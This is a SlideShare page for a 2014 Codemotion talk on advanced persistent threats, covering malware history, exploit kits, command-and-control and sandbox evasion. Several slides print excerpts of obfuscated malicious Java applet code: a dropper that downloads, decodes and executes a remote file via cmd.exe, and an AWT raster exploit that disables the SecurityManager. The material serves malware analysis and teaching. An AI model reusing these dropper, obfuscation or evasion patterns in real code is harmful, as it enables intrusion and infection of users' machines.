SlideShare una empresa de Scribd logo

The magic world of APT 0.6 - Pompili

Codemotion
Codemotion

Slides from Simone Pompili talk @Codemotion Roma 2014

TecnologíaEmpresariales
1 de 51
Descargar para leer sin conexión
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com THE MAGIC WORLD OF ADVANCED PERSISTENT THREATS Andrea Pompili There are only 10 types of people in the world: Those who understand binary, and those who don't apompili@hotmail.com
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Attacker Zovi) http://trailofbits.files.wordpress.com/2011/08/attacker-math.pdf
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Come si sviluppa un attacco? <#1> <#2> <#3>
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com <1996> The Dark Side of the Moon http://vx.org.ua/29a/main.html
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com rem barok -loveletter(vbe) <i hate go to school> rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group / Manila,Philippines <2000> 8,7 miliardi di dollari
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com <2001> The Nimda Style Microsoft IIS e PWS Extended Unicode Directory transversalVulnerability Microsoft IIS/PWS Escaped Characters Decoding Command Execution Vulnerability Microsoft IE MIME Header Attachment Execution VulnerabilityTFTP Server UDP:69 RICHED20.DLL Microsoft Office 2000 DLL Execution Vulnerability Microsoft IE MIME Header Attachment Execution Vulnerability 635 milioni di dollari
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com SQL Server 2000 Desktop Engine 75.000 computer infettati in soli 10 minuti payload di soli 376 byte (residente esclusivamente in memoria) 1,2 miliardi di dollari
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com 22,6 miliardi di dollari DDOS contro www.sco.com Upload&Execute0x85 0x13 0x3c 0x9e 0xa2 Backdoor TCP 3127-3198 http://echohacker.altervista.org/articoli/mydoom.html
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com <2010-2012> Government in Action > Stuxnet (2010) > Duqu (2011) > Flame (2012) > Gauss (2012) http://www.forbes.com/sites/andygreenberg/2012/03/23/shopping- for-zero-days-an-price-list-for-hackers-secret-software-exploits/ ShoppingFor Zero-Days
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Il Malware più complesso della storia > 20MB di dimensione (900Kb programma principale/dropper + 16 moduli ad oggi rilevati) > 80 domini utilizzati come sistemi di Comando e Controllo > Diffusione via USB Stick (Infectmedia) > Enumerazione dei dispositivi Bluetooth (Beetlejuice) > Registrazione audio (Microbe) > Windows Update MITM (Munch & Gadget) MD5 Collision Attack
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com <2007> Storm Worm & CyberCrime Market http://www.pcworld.com/article/138694/article.html
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com http://www.infosecblog.org/2013/01/you-are-the-target/hackedpc2012/ « »
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Advanced Persistent Threats 101 > Trust Exploitation Social Engineering Spear Phishing Botnet Drive-to-Click Strategy
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com > Trust Exploitation > Client Exploitation Exploit Pack (e.g.Neutrino) 0-Day Advanced Persistent Threats 101
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com > Trust Exploitation > Client Exploitation > Multi-Stage Shellcoding Dropper/Downloader Modules(e.g.RAT, Infostealer,etc.) Good Covert Channel Advanced Persistent Threats 101
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com > Trust Exploitation > Client Exploitation > Multi-Stage > Multi-Vector Email WebSites Botnet Physical (USB) Advanced Persistent Threats 101
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com > Trust Exploitation > Client Exploitation > Multi-Stage > Multi-Vector > Resiliency Camouflaging Command &Control Good Covert Channel Advanced Persistent Threats 101
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Make or Buy?
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com The Botnet Choice
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Drive-to-Click <#1>
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Drive-to-Click <#2>
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Drive-to-Click <#3>
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Drive-to-Click <#4>
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Drive-to-Click <#5>
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Trick#1> Giochiamo con le estensioni RLO Unicode control character
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Trick#2> Content-Disposition Nightmare http://www.gnucitizen.org/blog/content-disposition-hacking/ Download Server Response Headers RFC 2616
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com <applet codebase=“http://blahblah.evilsite.in/hiddenpath/" archive=“http://blahblah.othersite.in/hiddenpath/ c8c34734f41cca863a972129369060d9” code=“rgmiv”> Trick#3> Client Exploiting
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com public class xp extends JApplet { public void init() { try { Object aobj[] = new Object[0]; Object obj = gsdfvg.ccla(tcbteokd.fuss(tcbteokd.p), 1); String s = "hpjwbludyi"; s = "wgpxrwyvzolbb"; s = "zdfmvftloqmakqysyu"; s = "nrrkqnjfylgtljyyferr"; cr.hzumfnc(obj); Object aobj1[] = new Object[0]; String s1 = "ofvszonrzgelnko"; s1 = "fefhtspcqhj"; s1 = "evztavmzjarjgwu"; Object obj1 = ygigtele.bjixqh(tcbteokd.fuss(tcbteokd.nq), new Class[] { Integer.TYPE }).newInstance(new Object[] { Integer.valueOf(tcbteokd.mdrikbua(9)) }); int ai[] = new int[8]; Object aobj2[] = new Object[7]; aobj2[2] = cr.hzumfnc(obj); ...
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com <01> XOR String Encryption public static String ok = ha.n("1:-:u:,/u26:<>ub:6+7>0264?>7"); ... public static String n(String s) { String s1 = ""; for (int i = 0; i < s.length(); i++) s1 += idzfihff(s.charAt(i)); return s1; } ... public static char idzfihff(char c) { return (char)(c ^ 0x5b); } https://media.blackhat.com/bh-us-12/Briefings/Oh/ BH_US_12_Oh_Recent_Java_Exploitation_Trends_and_Malware_WP.pdf Malware
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com <02> Java Reflection public static Class fuss(String s) throws Exception { return Class.forName(s); } ... public static Object dngfuv(Method method, Object obj, Object aobj[]) { return method.invoke(obj, aobj); } public static Constructor bjixqh(Class class1, Class aclass[]) { return class1.getConstructor(aclass); } ... https://media.blackhat.com/bh-us-12/Briefings/Oh/ BH_US_12_Oh_Recent_Java_Exploitation_Trends_and_Malware_WP.pdf Malware
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com <03> ClassLoader Override class t extends ClassLoader { public static void ujrzjw(t t1, String s) { try { Class class1 = t1.defineClass("qbw", tcbteokd.xcpoalaefqfvuacylvakyi, 0, tcbteokd.xcpoalaefqfvuacylvakyi.length); ygigtele.bjixqh(class1, new Class[] { tcbteokd.fuss("java.lang.String") }).newInstance(new Object[] { s }); } catch (Exception ex) { System.exit(0); } } } Malware
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com ... private static void lcsqyrgtbct (String s, int i) { String s1 = s + Integer.valueOf(i); ... rchannel= Channels.newChannel((new URL(s1)).openStream()); ... File file = File.createTempFile("~tmf", null); FileOutputStream fos= new FileOutputStream(file); for (int j = 0; j < abyte0.length; j++) abyte0[j] = (byte)(abyte0[j] ^ 0x29); fos.write(abyte0); if (abyte0.length > 1024) try { Runtime.getRuntime().exec(new String[] { "cmd.exe", "/C", file.getAbsolutePath() }); } catch (IOException ioe) { (new ProcessBuilder(new String[] { file.getAbsolutePath() })).start(); } The Dropper Class
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Object obj1 = new java.awt.image.DataBufferByte(9); int[] ai = new int[8]; Object[] oo = new Object[7]; oo[2] = new java.beans.Statement(System.class, "setSecurityManager", new Object[1]); ... DataBufferByte obj5 = new DataBufferByte(8); for (int j = 0; j < 8; j++) obj5.setElem(j, -1); MultiPixelPackedSampleModel obj6 = new MultiPixelPackedSampleModel(DataBuffer.TYPE_BYTE,4,1,1,4,0); Raster obj7 = Raster.createWritableRaster(obj6, obj5, null); MultiPixelPackedSampleModel obj8 = new MultiPixelPackedSampleModel(DataBuffer.TYPE_BYTE,4,2,1, 0x3fffffdd - (tcbteokd.pi ? 16 : 0), 288 + (tcbteokd.pi ? 128 : 0)); Raster obj9 = Raster.createWritableRaster(obj8, obj1, null); byte obj10 = new byte[] {0, -1} IndexColorModel obj11 = new IndexColorModel(1, 2, obj10, obj10, obj10); CompositeContext obj12 = AlphaComposite.Src.createContext(obj11, obj11, null); obj12.compose(obj7, obj9, obj9); The Malware Core http://valhalla.allalla.com/2013/08/ java-netbeans-applet-integer-overflow-win32-target-added/
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com The Cheaper Path to Exploiting Blackole Exploit Kit http://en.wikipedia.org/wiki/Blackhole_exploit_kit Styx Exploit Pack http://krebsonsecurity.com/2013/07/styx-exploit-pack-domo-arigato-pc-roboto Neutrino http://malware.dontneedcoffee.com/2013/03/hello-neutrino-just-one-more- exploit-kit.html RedKit http://blog.spiderlabs.com/2012/05/a-wild-exploit-kit-appears.html
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com The InfoStealer Choice
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com The RAT Choice
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Bitcoin + APT = Ransomware
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com The Command&Control Choice <#1>
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com The Command&Control Choice <#2>
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com The Command&Control Choice <#3>
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com The Command&Control Choice <#4>
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com “The truth is, consumer-grade antivirus products can’t protect against targeted malware created by well- resourced nation-states with bulging budgets. They can protect you against run-of-the-mill malware: banking trojans, keystroke loggers and e-mail worms. But targeted attacks like these go to great lengths to avoid antivirus products on purpose” MikkoHypponen(F-Secure) <2012> The Antivirus Maker Confession
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com The Way to Sandboxing
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com <01> USER-MODE AGENT Softwarecomponent inaguest operating system (keylogger) <02> KERNEL-MODE PATCHING Guestoperating system Kernelmodified fortracing (rootkit) <03> VIRTUAL MACHINE MONITORING Customized Hypervisor to monitor the guest operatingsystem <04> SYSTEM EMULATION Hardwareemulator to hookappropriate memory, IO functions,peripherals, etc. <05> KERNEL EMULATION Kernelemulator tohookappropriate system calls, etc. The Way to Sandboxing
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Una lista (molto) parziale dei Player > Norman Sandbox (Norway2001) > FireEye (US2004) > Damballa (US2006) > Lastline/Anubis/Wepawet (Austria 2006) > Sandboxie (2006) > Cuckoo Sandbox (2010) > VMRay formerly CWSandbox (Germany 2007) > Joe Security LLC (Switzerland 2007) > BitBlaze (2008) > ThreatExpert (Ireland 2008) > Ether (US 2009)
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Una lista (completamente) parziale degli Evader
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Evading Sandbox 4 Dummies > Human Interaction (UpClicker, December 2012) > MessageBox (Something thatneed to be clicked) > Sleep Calls (Trojan Nap, uncoveredin February2013) > Time Triggers (Hastati, March 2013 a massive, data-destroying attack in South Korea) > Check Internet Connection > Check Volume information and Size > Check self Executable name > Execution after reboot > Check System services, files and communication ports
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Il limite delle Sandbox Minuti def: il Paziente Zero è il primo paziente individuato nel campione della popolazione di un'indagine epidemiologica…
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Sicuramente meglio che confidare negli utenti
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Domande? Italian ‫ة‬َّ‫ي‬َ‫أ‬ ‫ِب‬‫ل‬‫ا‬َ‫ط‬َ‫م‬ Arabic ¿Preguntas? Spanish Questions? English tupoQghachmey Klingon Sindarin Japanese Ερωτήσεις? Greek вопросы? Russian

Recomendados

The Dark Side of Malware Analysis - Andrea Pompili - Codemotion Rome 2015
The Dark Side of Malware Analysis - Andrea Pompili - Codemotion Rome 2015The Dark Side of Malware Analysis - Andrea Pompili - Codemotion Rome 2015
The Dark Side of Malware Analysis - Andrea Pompili - Codemotion Rome 2015Codemotion
 
#dd12 OAuth for Domino Developers
#dd12 OAuth for Domino Developers#dd12 OAuth for Domino Developers
#dd12 OAuth for Domino DevelopersDominopoint - Italian Lotus User Group
 
I have come to bury the BIOS, not to open it: The need for holistic systems
I have come to bury the BIOS, not to open it: The need for holistic systemsI have come to bury the BIOS, not to open it: The need for holistic systems
I have come to bury the BIOS, not to open it: The need for holistic systemsbcantrill
 
XPDDS18: Design and Implementation of Automotive: Virtualization Based on Xen...
XPDDS18: Design and Implementation of Automotive: Virtualization Based on Xen...XPDDS18: Design and Implementation of Automotive: Virtualization Based on Xen...
XPDDS18: Design and Implementation of Automotive: Virtualization Based on Xen...The Linux Foundation
 
Mise en place de Nagios core sur Ubuntu 22.04
Mise en place de Nagios core sur Ubuntu 22.04Mise en place de Nagios core sur Ubuntu 22.04
Mise en place de Nagios core sur Ubuntu 22.04ImnaTech
 
Pentesting Android Apps using Frida (Beginners)
Pentesting Android Apps using Frida (Beginners)Pentesting Android Apps using Frida (Beginners)
Pentesting Android Apps using Frida (Beginners)Chandrapal Badshah
 
Bootloader: Teoria de operação e implementação via USB para PIC
Bootloader: Teoria de operação e implementação via USB para PICBootloader: Teoria de operação e implementação via USB para PIC
Bootloader: Teoria de operação e implementação via USB para PICDaniel Rodrigues de Sousa
 
MacOS forensics and anti-forensics (DC Lviv 2019) presentation
MacOS forensics and anti-forensics (DC Lviv 2019) presentationMacOS forensics and anti-forensics (DC Lviv 2019) presentation
MacOS forensics and anti-forensics (DC Lviv 2019) presentationOlehLevytskyi1
 

Recomendados

The Dark Side of Malware Analysis - Andrea Pompili - Codemotion Rome 2015
The Dark Side of Malware Analysis - Andrea Pompili - Codemotion Rome 2015The Dark Side of Malware Analysis - Andrea Pompili - Codemotion Rome 2015
The Dark Side of Malware Analysis - Andrea Pompili - Codemotion Rome 2015Codemotion
 
#dd12 OAuth for Domino Developers
#dd12 OAuth for Domino Developers#dd12 OAuth for Domino Developers
#dd12 OAuth for Domino DevelopersDominopoint - Italian Lotus User Group
 
I have come to bury the BIOS, not to open it: The need for holistic systems
I have come to bury the BIOS, not to open it: The need for holistic systemsI have come to bury the BIOS, not to open it: The need for holistic systems
I have come to bury the BIOS, not to open it: The need for holistic systemsbcantrill
 
XPDDS18: Design and Implementation of Automotive: Virtualization Based on Xen...
XPDDS18: Design and Implementation of Automotive: Virtualization Based on Xen...XPDDS18: Design and Implementation of Automotive: Virtualization Based on Xen...
XPDDS18: Design and Implementation of Automotive: Virtualization Based on Xen...The Linux Foundation
 
Mise en place de Nagios core sur Ubuntu 22.04
Mise en place de Nagios core sur Ubuntu 22.04Mise en place de Nagios core sur Ubuntu 22.04
Mise en place de Nagios core sur Ubuntu 22.04ImnaTech
 
Pentesting Android Apps using Frida (Beginners)
Pentesting Android Apps using Frida (Beginners)Pentesting Android Apps using Frida (Beginners)
Pentesting Android Apps using Frida (Beginners)Chandrapal Badshah
 
Bootloader: Teoria de operação e implementação via USB para PIC
Bootloader: Teoria de operação e implementação via USB para PICBootloader: Teoria de operação e implementação via USB para PIC
Bootloader: Teoria de operação e implementação via USB para PICDaniel Rodrigues de Sousa
 
MacOS forensics and anti-forensics (DC Lviv 2019) presentation
MacOS forensics and anti-forensics (DC Lviv 2019) presentationMacOS forensics and anti-forensics (DC Lviv 2019) presentation
MacOS forensics and anti-forensics (DC Lviv 2019) presentationOlehLevytskyi1
 
Ateliers d’une application Web vulnérable
Ateliers d’une application Web vulnérable Ateliers d’une application Web vulnérable
Ateliers d’une application Web vulnérable Ayoub Rouzi
 
Kernel Recipes 2017 - An introduction to the Linux DRM subsystem - Maxime Ripard
Kernel Recipes 2017 - An introduction to the Linux DRM subsystem - Maxime RipardKernel Recipes 2017 - An introduction to the Linux DRM subsystem - Maxime Ripard
Kernel Recipes 2017 - An introduction to the Linux DRM subsystem - Maxime RipardAnne Nicolas
 
Rust Embedded Development on ESP32 and basics of Async with Embassy
Rust Embedded Development on ESP32 and basics of Async with EmbassyRust Embedded Development on ESP32 and basics of Async with Embassy
Rust Embedded Development on ESP32 and basics of Async with EmbassyJuraj Michálek
 
Alphorm.com Formation Hacking et Sécurité 2020 (1/3) : Méthodologies de Pente...
Alphorm.com Formation Hacking et Sécurité 2020 (1/3) : Méthodologies de Pente...Alphorm.com Formation Hacking et Sécurité 2020 (1/3) : Méthodologies de Pente...
Alphorm.com Formation Hacking et Sécurité 2020 (1/3) : Méthodologies de Pente...Alphorm
 
I Want These * Bugs Off My * Internet
I Want These * Bugs Off My * InternetI Want These * Bugs Off My * Internet
I Want These * Bugs Off My * InternetDan Kaminsky
 
P fsense
P fsenseP fsense
P fsenserequinblanco
 
Media Source Extensions
Media Source ExtensionsMedia Source Extensions
Media Source ExtensionsFITC
 
Rapport DVWA: File Upload
Rapport DVWA: File UploadRapport DVWA: File Upload
Rapport DVWA: File UploadAyoub Rouzi
 
Attacks, Lies and the Underground World - Andrea Pompili - Codemotion Amsterd...
Attacks, Lies and the Underground World - Andrea Pompili - Codemotion Amsterd...Attacks, Lies and the Underground World - Andrea Pompili - Codemotion Amsterd...
Attacks, Lies and the Underground World - Andrea Pompili - Codemotion Amsterd...Codemotion
 
The magic world of Advanced Persistent Threat - Andrea Pompili - Codemotion M...
The magic world of Advanced Persistent Threat - Andrea Pompili - Codemotion M...The magic world of Advanced Persistent Threat - Andrea Pompili - Codemotion M...
The magic world of Advanced Persistent Threat - Andrea Pompili - Codemotion M...Codemotion
 
Andrea Pompili - The Dark Side of Malware Analysis
Andrea Pompili - The Dark Side of Malware AnalysisAndrea Pompili - The Dark Side of Malware Analysis
Andrea Pompili - The Dark Side of Malware AnalysisCodemotion
 
Attacchi, bugie e underground digitale by Andrea Pompili
Attacchi, bugie e underground digitale by Andrea PompiliAttacchi, bugie e underground digitale by Andrea Pompili
Attacchi, bugie e underground digitale by Andrea PompiliCodemotion
 
Pompili - The miracle of sprite multiplication (C64)
Pompili - The miracle of sprite multiplication (C64)Pompili - The miracle of sprite multiplication (C64)
Pompili - The miracle of sprite multiplication (C64)Codemotion
 
Pompili - From hero to_zero: The FatalNoise neverending story
Pompili - From hero to_zero: The FatalNoise neverending storyPompili - From hero to_zero: The FatalNoise neverending story
Pompili - From hero to_zero: The FatalNoise neverending storyCodemotion
 
Cyber Wars in the Cyber Space - Andrea Pompili - Codemotion Rome 2017
Cyber Wars in the Cyber Space - Andrea Pompili - Codemotion Rome 2017Cyber Wars in the Cyber Space - Andrea Pompili - Codemotion Rome 2017
Cyber Wars in the Cyber Space - Andrea Pompili - Codemotion Rome 2017Codemotion
 
Why I've to waste my time on cryptography? - Andrea Pompili - Codemotion Rome...
Why I've to waste my time on cryptography? - Andrea Pompili - Codemotion Rome...Why I've to waste my time on cryptography? - Andrea Pompili - Codemotion Rome...
Why I've to waste my time on cryptography? - Andrea Pompili - Codemotion Rome...Codemotion
 
Wearable Botnets and Happy Hacked Drivers - Andrea Pompili - Codemotion Milan...
Wearable Botnets and Happy Hacked Drivers - Andrea Pompili - Codemotion Milan...Wearable Botnets and Happy Hacked Drivers - Andrea Pompili - Codemotion Milan...
Wearable Botnets and Happy Hacked Drivers - Andrea Pompili - Codemotion Milan...Codemotion
 
Wearable botnets 201560319_v3
Wearable botnets 201560319_v3Wearable botnets 201560319_v3
Wearable botnets 201560319_v3Codemotion
 
Chi l'ha detto che i virus su Linux non esistono?
Chi l'ha detto che i virus su Linux non esistono?Chi l'ha detto che i virus su Linux non esistono?
Chi l'ha detto che i virus su Linux non esistono?Codemotion
 
Web+proxy Posts - Page 1
Web+proxy Posts - Page 1Web+proxy Posts - Page 1
Web+proxy Posts - Page 1scientificcuff635
 
Application Security for the masses
Application Security for the massesApplication Security for the masses
Application Security for the massesCodemotion
 
Using Java to build robots with high schoolers
Using Java to build robots with high schoolersUsing Java to build robots with high schoolers
Using Java to build robots with high schoolersVMware Tanzu
 

Más contenido relacionado

La actualidad más candente

Ateliers d’une application Web vulnérable
Ateliers d’une application Web vulnérable Ateliers d’une application Web vulnérable
Ateliers d’une application Web vulnérable Ayoub Rouzi
 
Kernel Recipes 2017 - An introduction to the Linux DRM subsystem - Maxime Ripard
Kernel Recipes 2017 - An introduction to the Linux DRM subsystem - Maxime RipardKernel Recipes 2017 - An introduction to the Linux DRM subsystem - Maxime Ripard
Kernel Recipes 2017 - An introduction to the Linux DRM subsystem - Maxime RipardAnne Nicolas
 
Rust Embedded Development on ESP32 and basics of Async with Embassy
Rust Embedded Development on ESP32 and basics of Async with EmbassyRust Embedded Development on ESP32 and basics of Async with Embassy
Rust Embedded Development on ESP32 and basics of Async with EmbassyJuraj Michálek
 
Alphorm.com Formation Hacking et Sécurité 2020 (1/3) : Méthodologies de Pente...
Alphorm.com Formation Hacking et Sécurité 2020 (1/3) : Méthodologies de Pente...Alphorm.com Formation Hacking et Sécurité 2020 (1/3) : Méthodologies de Pente...
Alphorm.com Formation Hacking et Sécurité 2020 (1/3) : Méthodologies de Pente...Alphorm
 
I Want These * Bugs Off My * Internet
I Want These * Bugs Off My * InternetI Want These * Bugs Off My * Internet
I Want These * Bugs Off My * InternetDan Kaminsky
 
Media Source Extensions
Media Source ExtensionsMedia Source Extensions
Media Source ExtensionsFITC
 
Rapport DVWA: File Upload
Rapport DVWA: File UploadRapport DVWA: File Upload
Rapport DVWA: File UploadAyoub Rouzi
 

La actualidad más candente (8)

Ateliers d’une application Web vulnérable
Ateliers d’une application Web vulnérable Ateliers d’une application Web vulnérable
Ateliers d’une application Web vulnérable
 
Kernel Recipes 2017 - An introduction to the Linux DRM subsystem - Maxime Ripard
Kernel Recipes 2017 - An introduction to the Linux DRM subsystem - Maxime RipardKernel Recipes 2017 - An introduction to the Linux DRM subsystem - Maxime Ripard
